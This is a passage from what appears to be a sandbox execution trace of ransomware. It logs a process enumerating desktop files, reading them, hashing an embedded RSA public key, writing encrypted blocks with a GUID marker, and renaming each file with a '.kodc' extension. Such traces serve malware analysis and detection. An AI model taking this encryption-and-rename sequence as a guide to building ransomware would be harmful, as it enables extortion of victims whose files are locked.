Flags=0x0, Size=0x100) returned 0x69bc60 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.775] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x340b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.775] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.775] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.775] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.776] CloseHandle (hObject=0x5cc) returned 1 [0100.777] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\77 l uyd5foD_16HEXj.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\77 l uyd5fod_16hexj.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\77 l uyd5foD_16HEXj.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\77 l uyd5fod_16hexj.gif.kodc")) returned 1 [0100.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0100.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.778] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0100.779] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1592c4d0, ftCreationTime.dwHighDateTime=0x1d5bccf, ftLastAccessTime.dwLowDateTime=0xf14839e0, ftLastAccessTime.dwHighDateTime=0x1d5bfa1, ftLastWriteTime.dwLowDateTime=0xf14839e0, ftLastWriteTime.dwHighDateTime=0x1d5bfa1, nFileSizeHigh=0x0, nFileSizeLow=0x162b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DSlXC5Gr0YME5YlGSV.flv", cAlternateFileName="DSLXC5~1.FLV")) returned 1 [0100.779] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\DSlXC5Gr0YME5YlGSV.flv") returned=".flv" [0100.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\DSlXC5Gr0YME5YlGSV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\dslxc5gr0yme5ylgsv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.779] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=5675) returned 1 [0100.779] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.782] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1605, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.782] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.783] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.783] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x162b, lpOverlapped=0x0) returned 1 [0100.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.783] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.784] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.784] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.784] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.784] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.784] GetLastError () returned 0x0 [0100.784] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.784] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.784] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.784] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.784] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1630) returned 0x9ba8d90 [0100.785] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5a10 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5a58 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.785] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e60 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e48 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.786] GetCurrentThreadId () returned 0x42c [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7588 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.786] GetCurrentThreadId () returned 0x42c [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e78 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.788] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x162b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.788] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.789] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.789] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.789] CloseHandle (hObject=0x5cc) returned 1 [0100.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3336ce0 [0100.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0100.790] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\DSlXC5Gr0YME5YlGSV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\dslxc5gr0yme5ylgsv.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\DSlXC5Gr0YME5YlGSV.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\dslxc5gr0yme5ylgsv.flv.kodc")) returned 1 [0100.791] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4fc9be0, ftCreationTime.dwHighDateTime=0x1d5baaa, ftLastAccessTime.dwLowDateTime=0xc5882570, ftLastAccessTime.dwHighDateTime=0x1d5c52a, ftLastWriteTime.dwLowDateTime=0xc5882570, ftLastWriteTime.dwHighDateTime=0x1d5c52a, nFileSizeHigh=0x0, nFileSizeLow=0xbe39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pC 1IafdNC2Xu47Zyxxd.bmp", cAlternateFileName="PC1IAF~1.BMP")) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0100.791] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\pC 1IafdNC2Xu47Zyxxd.bmp") returned=".bmp" [0100.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\pC 1IafdNC2Xu47Zyxxd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\pc 1iafdnc2xu47zyxxd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc 